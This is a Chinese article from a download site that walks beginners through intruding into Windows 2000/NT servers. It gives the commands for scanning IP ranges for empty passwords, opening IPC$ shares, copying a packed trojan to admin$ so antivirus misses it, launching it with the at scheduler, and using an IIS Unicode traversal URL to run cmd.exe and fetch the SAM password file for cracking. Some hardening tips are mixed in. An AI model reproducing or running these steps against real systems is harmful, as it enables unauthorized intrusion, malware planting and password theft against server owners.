驱动管家:安全、高效、精准的专业驱动下载站!

网站入侵方法大揭秘 不懂如何入侵的看过来!

2018-03-02 15:05:40责编:llp   来源:驱动管家     人气:

首先请安装WIN2000系统,然后打开扫描软件X-Scan2.3,再点击“设置/扫描参数”,在出现的对话框中添入一段IP地址,如61.139.*.1-61.139.2**.255,然后点击确定。继续点击“设置/扫描模块”,勾选SQL-Server弱口令、NT-Server弱口令,点击确定,再点击“开始扫描”。一会儿后,X-Scan就已经扫描完了,看看结果,有几十台电脑符合我们的要求。任意点击一IP地址如61.193.*.100,打开追捕,查看了一下该IP的具体位置以及用户名,做到心中有数,并查看一下该IP所开的端口以及所提供的服务,相关的步骤都可用X-Scan实现。收集完所有需要的信息后,就可以开始入侵了。

打开一个cmd窗口,输入net use \\61.193.*.100\ipc$ “密码” /user:”用户名”,回车,如果出现命令成功完成,那我们的电脑就和对方建立了IPC连接,再次在cmd中输入copy c:\hack\wollf.exe \\61.193.*.100\admin$,回车,这时我们就将木马程序wollf.exe拷贝到了对方的系统目录下,不过最好先加一下壳(这样不易被病毒防火墙查杀)。下一步就是启动这个黑客程序,WinNT上面有Schedule(定时)时务,可利用它来启动这个程序。首先看一下对方此时的时间,以便决定何时启动。输入命令net time \\61.193.*.100,查看一下对方此时的时间,以便决定何时启动。输入命令net time \\61.193.*.100,查看到对方的本地时间为23:11,那我们就用at命令来启动它。输入at \\61.193.*.100 23:13 wollf.exe,等待几分钟,我们就可以Telnet上去了。

这一次黑客入侵发现,管理员安全意识过于薄弱,密码竟然为空。而在我国的电脑上空口令非常多见,请现在还在使用空口令的用户赶快加上密码,密码最好在8位以上,采用大小写字母加字符的组合。不要以为采用了密码就可以安全无忧了,请记住在理论上没有攻克不了的密码,所以一定还要定期更改密码。还有一点,SQL Server安装后将产生默认的SA用户,密码为空,黑客可以SQL Server客户端来进行数据库远程连接。如果被扫描到,那你的系统也就完了,它所开放的端口为1433。

OK,请大家再次打开X-Scan,在扫描模块中点击IIS漏洞,并设置一个C类网段,经过扫描,又发现目标主机。

网站入侵方法大揭秘 不懂如何入侵的看过来!

IIS的漏洞比较多,但笔者认为比较经典的漏洞有Unncode,不过现在有这种漏洞的电脑已经比较少了,但少并不代表没有,打开浏览器输入http://IP/scripts/..% c1% 1c../winnt/system32/cmd.exe?/c dir c:/等语句试试,看见了C盘了吗?Unncode在一般情况下是不能获得管理员权限的,不过它可以下载SAM文件,在本地用LC4来进行暴力破解。SAM文件保存着Windows2000的登录名和密码等许多有用的信息,在WinNT中它叫SAM_,SAM文件在Windows启动后即被锁定,无法更改、拷贝,但可使用它在WinNT的Repair中的备份文件。

防御办法是把主目录C:\Inetpub修改成D:\Inetpub,对于Inetput目录中的Scripts,最好删除或更改文件名。因为在Scripts目录里可执行.EXE文件,它可是木马运行的好地方。可在“Internet信息服务”?“默认Web站点”中进行修改,我们还可以用Iislockd这个软件来进行防范,它是IIS管理员们的好助手。

另外还有IDQ/IDA溢出,对于这个溢出,可用Snake IIS溢出管理员进行防护。对于用漏洞进行溢出管理员的操作,我们可以这样防护:点击“计算机管理?Internet信息服务?默认Web站点”,点击右键选择属性,在出现的Web站点属性窗口中单主目录,在出现的目录中点击配置,在应用程序映射中删除.IDQ和.IDQ,确定后也就补住了这个漏洞。DDoS攻击现在还不是很常见,因为它所需要的条件较高,不是每个人都可以实现的。

  • 如何降低ie mime sniffing功能带来的风险?

    如何降低ie mime sniffing功能带来的风险?

    IE有一个特性,那就是在将一个文件展示给用户之前会首先检查文件的类型,这乍看起来并没什么问题,但实际上这是相当危险的,因为这会允许IE执行图片中的代码,即嵌入在一个图像中的JavaScript代码。引入MIME sni

    详情2018-02-28 18:12:04责编:llp   来源:驱动管家     
  • byod有什么价值?byod政策从安全开始

    byod有什么价值?byod政策从安全开始

    一个有效的BYOD政策始于接入和管理政策,同时也需要确保网络能够根据应用情况进行扩展,然而,这需要整个IT部门的协作。在2012年Interop大会上,IT从业人员和供应商探讨了打开了这个BYOD潘多拉盒子,网络管理人员

    详情2018-02-01 14:43:43责编:llp   来源:驱动管家     
  • 分享木马保护生成的三种方法 要对木马进行验证

    分享木马保护生成的三种方法 要对木马进行验证

    这几天研究了一下木马保护生成,现在给各位菜鸟分享一下。很多人做木马生成器但是不想让别人改或研究生成后的木马这就需要对生成出的木马进行保护。保护的手段一般是加壳或者加密。过程一般是将配置信息写入木马

    详情2018-02-12 18:08:02责编:llp   来源:驱动管家     
  • 键盘安全问题 如何保护从键盘输入的数据?

    键盘安全问题 如何保护从键盘输入的数据?

    键盘安全问题及危害通过各种黑客技术,黑客可以通过远程控制在用户的电脑中安装记录键盘的程序,这些被称作键盘记录器的工具可以记录用户从键盘输入的所有信息。由于当前黑客技术日益公开化,以至于即使是黑客初

    详情2018-02-09 11:41:48责编:llp   来源:驱动管家     
  • 为什么说access数据库是鸡肋?access教程执行命令会造成什么影响?

    为什么说access数据库是鸡肋?access教程执行命令会造成什么影响?

    现在我们在脚本注入攻击的技术中,常用的手法分好多种,最普通的是利用子查询或者是Union联合查询来取得一些特殊表中的内容,比如Admin,Log表等等,这是一种纯粹的对数据库的攻击方式,而MSSQL Server的方法则更为多

    详情2018-02-04 18:31:52责编:llp   来源:驱动管家     
  • 网站挂马检测 麦咖啡vse 8.5服务器如何查找挂马?

    网站挂马检测 麦咖啡vse 8.5服务器如何查找挂马?

    正好今天在查看服务器日志的时候 发现McAfee又一次成功的拦截了挂马,特给大家分享下。重点:单单的防还是不能解决问题,下面是我们找出真凶了给大家介绍一个工具可以像MMC计算机管理管理单元中的“会话”文件夹,

    详情2018-01-31 08:52:44责编:llp   来源:驱动管家     
  • 什么是配置漏洞?怎么利用配置漏洞获得主机权限?

    什么是配置漏洞?怎么利用配置漏洞获得主机权限?

    常见的漏洞分为软件漏洞和配置漏洞,软件漏洞的挖掘需要扎实的编程功底和对操作系统原理的深入理解;配置漏洞通常是由于管理员的自身知识的不足造成的。在 Linux 环境下,X Window 是用来显示图形界面应用程

    详情2018-02-23 17:51:47责编:llp   来源:驱动管家     
  • 六种入侵批处理程序代码 怎么自动挂马改主页?

    六种入侵批处理程序代码 怎么自动挂马改主页?

    DOS批处理就是,将一些之前预备好的需要多次统一运行的DOS命令写在一起,每次只要输入一次批处理就可以达到将其包含的所有DOS命令排头输入一遍的效果,这样就可以大大的节省时间提高效率。下面为大家介绍六种入侵

    详情2018-02-03 10:57:13责编:llp   来源:驱动管家     
  • 如何获得安全中国网站的权限?入侵安全中国网站的步骤

    如何获得安全中国网站的权限?入侵安全中国网站的步骤

    安全中国用的是dedecms,如果是5 5版本在这data common inc就可以找到root名字和密码root找到后用好用孤水绕城写的UDF PHP来提权,免杀的很好用。上传了个port exe先读端口图1然后把sethc替换成explorer,图2连接服

    详情2018-02-07 08:54:08责编:llp   来源:驱动管家     
  • 勒索病毒怎么防范?安装金山毒霸企业版软件2012

    勒索病毒怎么防范?安装金山毒霸企业版软件2012

    WannaCry勒索病毒的风声渐渐平息了。虽然全球范围内仍有大量的传播和感染存在,但大家似乎都已经不怎么关心了。不过正如地震之后的余震,病毒传播过程中一般都会出现新的变种,危害往往更大,所以警惕是不能放松

    详情2018-01-13 19:26:52责编:llp   来源:驱动管家